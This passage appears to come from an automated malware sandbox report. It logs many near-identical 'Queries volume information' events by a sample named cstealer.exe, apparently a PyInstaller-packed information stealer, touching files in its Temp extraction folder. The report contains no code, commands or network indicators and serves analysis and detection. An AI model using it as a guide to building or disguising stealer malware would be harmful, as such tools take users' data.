                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\libcrypto-1_1.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\libffi-8.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\select.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\sqlite3.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\unicodedata.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\VCRUNTIME140.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_bz2.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_queue.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_socket.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\select.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_ssl.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_hashlib.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_queue.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer\md.cp311-win_amd64.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer\md__mypyc.cp311-win_amd64.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\unicodedata.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_sqlite3.pyd VolumeInformationJump to behavior
